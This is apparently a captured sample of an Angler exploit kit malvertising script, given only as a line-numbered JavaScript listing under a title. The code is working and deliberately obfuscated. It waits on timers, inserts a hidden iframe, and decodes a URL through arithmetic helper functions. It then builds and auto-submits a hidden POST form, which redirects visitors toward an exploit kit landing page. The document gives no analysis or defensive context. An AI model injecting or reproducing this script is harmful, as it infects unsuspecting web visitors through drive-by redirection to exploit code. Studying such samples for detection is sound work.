Angler EK obfuscated malvertising script leading to redirect

1. (function() {
2.     function y() {
3.         var ca = {
4.             "ux": function() {
5.                 return 'd' + 'iv';
6.             },
7.             "ge": function() {
8.                 return document.body || document.getElementsByTagName('body')[0];
9.             },
10.             "oi": function() {
11.                 return document.appendChild;
12.             },
13.             "tme": function(rnqb) {
14.                 var afe = document.createElement(this['ux']());
15.                 afe.appendChild(rnqb);
16.                 this['ge']().appendChild(afe);
17.             },
18.             "s": function() {
19.                 var m = document.createElement(this['ro']());
20.                 m.id = 'lzdj';
21.                 var dl = m.style;
22.                 dl.width = '100' + '%';
23.                 dl.border = 0;
24.                 dl.height = '100' + 'px';
25.                 return m;
26.             },
27.             "cg": function(eajq) {
28.                 var sh = setTimeout(pjmh, 640);
29.                 eajq.onload = function() {
30.                     pjmh(sh)
31.                 };
32.             },
33.             "ro": function() {
34.                 return 'if' + 'rame';
35.             }
36.         };
37.         rfd();
38.         var fk = ca['s']();
39.         ca['cg'](fk);
40.         ca['tme'](fk);
41.     };
42.  
43.     function jofk(olrw) {
44.         var oh = {
45.             "3955023094": "hkBbW84K4is1jf6LZID0oCv%2FxZVXreHhwptu4TAkXkU%3D"
46.         };
47.         for (var db in oh) {
48.             var qp = oh[db];
49.             var ubnb = document.createElement('input');
50.             ubnb.type = 'hidden';
51.             ubnb.name = db;
52.             ubnb.value = qp;
53.             olrw.appendChild(ubnb);
54.         }
55.     };
56.  
57.     function xrs(ka) {
58.         var mop = ka.contentDocument || ka.contentWindow || ka;
59.         var tv = mop;
60.         if (mop.document) {
61.             tv = mop.document.body || mop.document.getElementsByTagName('body')[0];
62.         } else {
63.             tv = mop.body || mop.getElementsByTagName('body')[0];
64.         }
65.         return tv;
66.     }
67.     this.pcv = function() {
68.         return 109;
69.     };
70.     this.mcp = function(zrel) {
71.         return Math.round((((zrel / 2) / 2) + 22.75));
72.     };
73.     this.oml = function(laud) {
74.         return Math.round(((((((((laud / 4) / 3) - 236) + 250) * 10) * 10) - 218) - 1364.6666666667));
75.     };
76.     this.bzhn = function() {
77.         return 107;
78.     };
79.     this.bywp = function() {
80.         return 98;
81.     };
82.     this.zd = function() {
83.         return 46;
84.     };
85.     this.njd = function() {
86.         return 47;
87.     };
88.     this.cs = function() {
89.         return 99;
90.     };
91.     this.pcgi = function(hq) {
92.         return Math.round((((((((((((hq + 35) - 183) * 8) - 18) + 81) - 160) * 5) * 8) - 197) / 3) + 11073));
93.     };
94.     this.suw = function() {
95.         return 111;
96.     };
97.     this.hyp = function(ky) {
98.         return Math.round(((((((((ky / 2) * 7) / 3) * 2) - 101) - 110) / 7) + 140.80952380952));
99.     };
100.     this.x = function() {
101.         return 102;
102.     };
103.     this.d = function() {
104.         return 106;
105.     };
106.     this.ak = function() {
107.         return 111;
108.     };
109.     this.o = function() {
110.         return 47;
111.     };
112.  
113.     function qq(f, z, jaw) {
114.         return String.fromCharCode(f.toString().substr(z, jaw));
115.     }
116.     this.f = function() {
117.         return 98;
118.     };
119.     this.jaw = function(hq) {
120.         return Math.round((((((((((hq / 4) + 88) - 43) + 186) + 9) - 132) - 204) * 5) + 514.75));
121.     };
122.     this.l = function() {
123.         return 108;
124.     };
125.  
126.     function c() {
127.         var jult = [],
128.             gbro = [],
129.             bso = 0,
130.             sz = "112116116231582539718588999107461109711819311154611464410830110104981823876230131046535215",
131.             azpj = {
132.                 "0": "v",
133.                 "28": "cftm",
134.                 "8": "pcgi",
135.                 "29": "x",
136.                 "36": "l",
137.                 "6": "mcp",
138.                 "17": "hyp",
139.                 "30": "bzhn",
140.                 "23": "njd",
141.                 "5": "o",
142.                 "35": "oml",
143.                 "3": "lm",
144.                 "7": "bywp",
145.                 "20": "cs",
146.                 "31": "f",
147.                 "9": "ae",
148.                 "21": "ak",
149.                 "16": "suw",
150.                 "32": "zd",
151.                 "34": "jaw",
152.                 "22": "pcv",
153.                 "24": "d"
154.             },
155.             azqz = [3, 3, 3, 3, 2, 3, 2, 2, 2, 2, 2, 3, 2, 3, 2, 3, 2, 2, 3, 2, 1, 3, 2, 3, 2, 3, 3, 2, 3, 2, 2, 3, 2, 3, 2, 2, 3];
156.         for (var m in azqz) {
157.             var ce = azqz[m],
158.                 f = sz.substr(bso, ce),
159.                 t = jult[bso],
160.                 qoat = azpj[m];
161.             if (String(f).length !== ce) {
162.                 f = sz.substr(bso, ce);
163.             }
164.             f = Number(f);
165.             if (qoat !== undefined) {
166.                 if (t) {
167.                     this[t] = String.fromCharCode((typeof qoat === 'function') ? qoat(f) : this[qoat](f));
168.                 } else {
169.                     gbro.push(String.fromCharCode((typeof qoat === 'function') ? qoat(f) : this[qoat](f)));
170.                 }
171.             } else {
172.                 (t) ? this[t] = String.fromCharCode(f): gbro.push(String.fromCharCode(f));
173.             }
174.             bso += Number(ce);
175.         }
176.         return gbro.join('');
177.     }
178.     this.cftm = function(e) {
179.         return Math.round(((((e * 8) / 4) + 214) - 459));
180.     };
181.     this.lm = function() {
182.         return 112;
183.     };
184.     this.v = function() {
185.         return 104;
186.     };
187.     this.ae = function() {
188.         return 105;
189.     };
190.  
191.     function rfd() {
192.         return document.body || document.getElementsByTagName('body')[0];
193.     }
194.  
195.     function pjmh(h) {
196.         var m = {
197.             "uis": function(xg) {
198.                 if (xg !== undefined) {
199.                     window.clearTimeout(xg);
200.                 }
201.             },
202.             "k": function(vgrr) {
203.                 var zyd = this['dpbn']();
204.                 jofk(vgrr);
205.                 zyd.onload = null;
206.                 xrs(zyd).appendChild(vgrr)
207.             },
208.             "ht": function(fx) {
209.                 return fx.appendChild;
210.             },
211.             "ylyc": function(m) {
212.                 var yqil = document.createElement('form');
213.                 yqil.action = c();
214.                 yqil.target = '_self';
215.                 yqil.method = 'POST';
216.                 return yqil;
217.             },
218.             "dpbn": function() {
219.                 return document.getElementById('lzdj');
220.             }
221.         };
222.         m['uis'](h);
223.         var s = m['ylyc']();
224.         m['k'](s);
225.         s.submit();
226.     }
227.  
228.     function lblh() {
229.         return document.body || document.getElementsByTagName('body')[0];
230.     }
231.     setTimeout(y, 317);
232. })();